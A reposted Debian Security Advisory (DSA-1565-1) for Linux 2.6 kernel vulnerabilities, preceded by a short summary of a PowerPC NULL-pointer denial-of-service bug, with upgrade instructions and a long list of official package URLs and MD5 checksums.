The chrp_show_cpuinfo function (chrp/setup.c) in Linux kernel 2.4.21 through 2.6.18-53, when running on PowerPC, might allow local users to cause a denial of service (crash) via unknown vectors that cause the of_get_property function to fail, which triggers a NULL pointer dereference. The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. This issue affects Linux kernel 2.4.21 through 2.6.18-53 running on the PowerPC architecture. The NFSv4 implementation is one of the distributed file system protocols. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


Debian Security Advisory DSA-1565-1 security@debian.org http://www.debian.org/security/ dann frazier May 1, 2008 http://www.debian.org/security/faq


Package : linux-2.6 Vulnerability : several vulnerabilities Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-6694 CVE-2008-0007 CVE-2008-1294 CVE-2008-1375

Several local vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-6694

Cyrill Gorcunov reported a NULL pointer dereference in code specific
to the CHRP PowerPC platforms.

CVE-2008-1294

David Peer discovered that users could escape administrator imposed cpu
time limitations (RLIMIT_CPU) by setting a limit of 0.

CVE-2008-1375

Alexander Viro discovered a race condition in the directory notification
subsystem that allows local users to cause a Denial of Service (oops)
and possibly result in an escalation of priveleges.

For the stable distribution (etch), this problem has been fixed in version 2.6.18.dfsg.1-18etch3.

The unstable (sid) and testing distributions will be fixed soon.

We recommend that you upgrade your linux-2.6, fai-kernels, and user-mode-linux packages.

Upgrade instructions


wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update will update the internal database apt-get upgrade will install corrected packages

The following matrix lists additional source packages that were rebuilt for compatability with or to take advantage of this update:

                                         Debian 4.0 (etch)
 fai-kernels                             1.17+etch.18etch3
 user-mode-linux                         2.6.18-1um-2etch.18etch3

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch


Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch3.dsc Size/MD5 checksum: 740 950fed7ed7c289cfea9c1b39f0f41bc0 http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch2.dsc Size/MD5 checksum: 740 6f6faa132a53e808bcc61823d140290a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch3.diff.gz Size/MD5 checksum: 5395308 ae08d42b58cd3cf93a23fe31615ac2fd http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz Size/MD5 checksum: 14435 4d10c30313e11a24621f7218c31f3582 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060 http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch3.dsc Size/MD5 checksum: 892 ca5cdee7568704bc9f6c58f786d0daae http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch3.tar.gz Size/MD5 checksum: 55267 981e9a0a1d79b1605164588eef7da492 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch3.dsc Size/MD5 checksum: 5672 4e4714f542968b30b2c3f94e203e1e04 http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch2.tar.gz Size/MD5 checksum: 55185 0a46d75b3ced870a96ea41b900f1ecaa http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch2.diff.gz Size/MD5 checksum: 16873 868c1f27ad2c8db782bbd2bdc3618d70 http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch2.dsc Size/MD5 checksum: 892 52c602d55bdc301a0622ed8a63745f29 http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch3.diff.gz Size/MD5 checksum: 16968 ff99991657e11545a0f557b623962c52

Architecture independent packages:

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-18etch3_all.deb Size/MD5 checksum: 3589210 d2033347599e8db12e2446fd75c0ce37 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-18etch3_all.deb Size/MD5 checksum: 54558 3362cfa5f1de0c80b1aa96f22d846c7e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-18etch3_all.deb Size/MD5 checksum: 1586214 a496f633c826ce730ce6150dff49209f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-18etch3_all.deb Size/MD5 checksum: 41463452 67e56915cd61f4b0058aa668e284ca8c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-18etch3_all.deb Size/MD5 checksum: 1085670 9c6513bc6e29a63d0aedc8da8958fc3f http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-18etch3_all.deb Size/MD5 checksum: 3752262 e2f225858212089b10aa319236d300f3

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 3027694 ef8b352212a8184702407e69cb7046bd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 268330 7b7d0ab15fe537a59c68b35531750739 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 54038 f42aafb19b9fae6445d0581277b60e92 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 23531650 8633558cda9f10fbadbc9299dde77575 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 54074 f4b61f5f330a7a2248d91432fa307f41 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 268076 09bdbafb6d32a4d9f8ceab5f1a6c666e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 23484202 d14e2e1d8537aa0cb2f2367f6ddd6762 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 23844262 0cb427290707d8a59a3afdf68f523e6b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 3052524 4323a32807ee9a2a7f13bc605ef0a9c7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 268772 bcec817953f14a50253dbe83e16d6c70 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 23462618 f6873f376755c4f29b24d0d11c9d70ae http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch3_alpha.deb Size/MD5 checksum: 267446 376df6aed1989d65f8144f8790862e17

amd64 architecture (AMD x86_64 (AMD64))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 15260738 6c000df81a113d2d69a9473a3d764f08 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 16859134 9480377d14efcd65c7bde090d2c18023 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 3357018 fcb1a842f85110b4a37d246621027ad3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 271914 9a7953d1adbcfbbea07a1357450f34a0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 15272470 2581dfa79e27ead359eb27642748b3df http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 54066 ce821a602278441fb157d2e8dffa7840 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 16820486 a1540f416895111ff4a4f6dc8d5ae2ad http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 3191118 dae286014c3a55824e3cb3040948caa4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 271584 5246a3f1ccb78bde203aab0338e90cd3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 54038 20567a8f59997151900492fbbdb5a5bf http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 54012 fcd8a752e777bf97667914fe658ca440 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 3167674 8fed61ce7278a060d600e54481851c2b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 3334306 bd7dd1d9b1518e0e52f3d513ad9f7cea http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 1650934 92ab0f73f6d2a1699f975ebede812c99 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 54034 224990e92d1255bac74a4a540ef8ee15 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 271184 4d2dfd603bf61408db599c9a972d6824 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 1682946 a2ccb197f0b4bc35e889a61c095add5e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-amd64_2.6.18.dfsg.1-18etch3_amd64.deb Size/MD5 checksum: 272850 4cab43a5199e6764b4857a91aaa52e09

arm architecture (ARM)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 7924514 6f93e2c2e0f3e5ddeddb95bd50d560ef http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 233088 acb0dd092348b024f08e0fc2467c31f3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-arm_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 54104 1437f25c10919b2f944295b8d7f168d8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 54064 1afdbacaa80466a4705a9b7ef50a4a9d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 239810 542097b2625db36fa56dfd7a29b66f37 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-iop32x_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 233830 e9a09a7d2a3927486adc68e1f1f7f0f8 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 3410416 dfc64565c01ac1f01784d72a8befa378 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-footbridge_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 7566074 822c9f74d2a88f4ac8e94210ecb06752 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 204874 1b773fb8b26f20629b8c868db90c5521 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s3c2410_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 5009022 ef23e40a692019b29f03f1ef7c864e12 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-rpc_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 4586924 66c55044ecf936cf08b69e3f78f8318e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-ixp4xx_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 8870890 a5a52727b1e019791b260c65d4793911 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-rpc_2.6.18.dfsg.1-18etch3_arm.deb Size/MD5 checksum: 198750 09c8bda5566b05dd0f969dedfc316d4c

hppa architecture (HP PA RISC)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 10552252 247e3774a6493211af6575531966a8a4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 3020374 69fbbe6591cdab73257c9f68bacb63c0 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 54044 77f6c66523dba6bb546b28b6b40b51e9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 196344 3ed099784ab8fe2f625462b1689ea7cd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 196818 f0d8bbb055a380b4c2b6064bbd9de0ac http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-hppa_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 54068 f91b5aa270a091f57a246e4cf1f6924a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 195368 29352673ddd4364e7dab3f5a1eb6e2d1 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 197570 bde8500410397921905e78f71cd68a10 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 11398348 8201e0a1b33c60d737fb2821dadb8d18 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc-smp_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 10999924 6a0b08925946b094d1638ca20095df15 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-parisc64-smp_2.6.18.dfsg.1-18etch3_hppa.deb Size/MD5 checksum: 11806360 7e63ef04531d59c2e3d0c93893d09bf0

i386 architecture (Intel ia32)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 16376092 f7e958b27f039bb044d46f94cc0c9231 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 54014 593ee26c9bed3b3c853511c6bbbd13ea http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch2_i386.deb Size/MD5 checksum: 25583354 6cc7cc34a241783bb8f3b2c9da7595a2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 278502 0f7f0e13f78438eeb1a939a637b8070c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 16466936 99c66acfa3cd0c109f0d3e2eaedf8877 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-k7_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 279716 62626201a89882bab17d10ce706b2df5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 14289932 049b2b4696e9cbeec20ec8c2056c7185 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 277596 042152b79d08eea568fd7481b4849386 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 16507076 a1a5845401d351c6fa1f380565bcb5d6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 16190600 6c50e29e1616140b367e626c93db2ae4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 271900 8d74262b41e039125ce896f8e8d2f8bd http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 272690 94db026fc7d498b48c5ac0b504f63390 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 1299670 879785b1ee5f4ef0bec7423e5c7599e9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 14279230 3101d59c0d8ad8bf617f4d0eefbbb7de http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 54088 e23a1d89d0f998caed5b594c5762dc19 http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 54032 d7b04d8d6f7a0d43579a499e4e0b681b http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch2_i386.deb Size/MD5 checksum: 5518204 0ce72fa3c9dfd208b1afa6912ffbcc3d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 16336828 0780d6d13e90466249f83e6d72ce1780 http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch3_i386.deb Size/MD5 checksum: 5518218 b86648769c5d3db2eb79b1bf6d490c50 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 3148608 633afcaaeb9d655b8bde34977bfd0bd5 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 272236 a611f8a0301e945ce72af3610bc05350 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 3054330 6cfae664f54be8c9ed3958c003f404c9 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 3167916 756a4eed5e44d0530c5f20a7bc80d3d2 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 279366 357140fdeff990683639e8f290593b0c http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch3_i386.deb Size/MD5 checksum: 25583596 f0c6d87c849d5384be99dba70d34fb0d http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 282728 a6b21a6fc38381b3884b2d2cd052d306 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 16836766 be9c22427d5666a80bf96e4c6501ebf7 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 54030 125894b7dd2b90ba5f48de2e7f04518b http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 1326708 add492f75bb0337e6e69a4afb73114c6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 16404432 9411c28cfbb27329417aa28b32de764c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 3170704 6b86d80969e7f62ceaae5ee5af7f1a5c http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-18etch3_i386.deb Size/MD5 checksum: 279198 92c75044e071977263a20c444ee655d0

ia64 architecture (Intel ia64)

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-18etch3_ia64.deb Size/MD5 checksum: 255464 ad4b1e9a12ca70ebb46a4c0f77bb62bf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-18etch3_ia64.deb Size/MD5 checksum: 28013676 bacb3a11176542aa961867eaac8539d3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch3_ia64.deb Size/MD5 checksum: 28181506 d0c75846976e8ebcd8baf1ee64a46414 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_ia64.deb Size/MD5 checksum: 54036 746e70c193f28c412acec61cf63e4572 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-18etch3_ia64.deb Size/MD5 checksum: 54050 fa3dc6c7671185e9ce4f7a00783990dc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_ia64.deb Size/MD5 checksum: 3081858 970b72442606e4878d77a274d4fa4306 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch3_ia64.deb Size/MD5 checksum: 255414 885054343ab6670ce1d90f7bdda61ef2

mips architecture (MIPS (Big Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 167030 7bce3329b9fc5d10faafecfac21bc70a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 186870 37e9b246abeb84886cd9a6215187f229 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 8309262 893346de1a07ed015320fe333fc41037 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 15653182 1938128d29990cc16bc3f829d3fa1cbf http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 6125514 e6842c7aedc7b70d5a4a5d8e624e9627 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 162870 5ebcff098fd97c89bc0f3057f68c3e31 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 54110 9408231d8eb91431b2ca495f1e94f3cb http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 54054 ed109dbb8bf134256164d6d07bd061f6 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 3413590 6013078ea705dbf5367d284f6ae401a4 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 154266 e5775b643e07055ec7121815d9316e62 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 186682 9027d5504f2739d64d1bb4111ec5e136 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 15677870 4b5a1f2e56c587a0d470ea17fab07647 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch3_mips.deb Size/MD5 checksum: 9075438 02f535440d5018de7b6233b232aa04de

mipsel architecture (MIPS (Little Endian))

http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 9863510 a6c8def78ca64e8e8b6ef10533186d30 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 149960 2e09d53e58663189a043b7d7493cec8e http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 5926528 cb0dfe477608a2da181596f9b78ceddc http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 155716 76a619c24cc74cfe22ab42f9f2964096 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 54040 affef50872a733868e2e3d58d566993a http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 155772 dd2d75f96ee5dd4c7a7ff8250f631649 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 182490 f6be30e57bbff0ecace79826d4474bb3 http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-18etch3_mipsel.deb Size/MD5 checksum: 5941862 45689ea22cb4ebdfb71936f79e00eebe 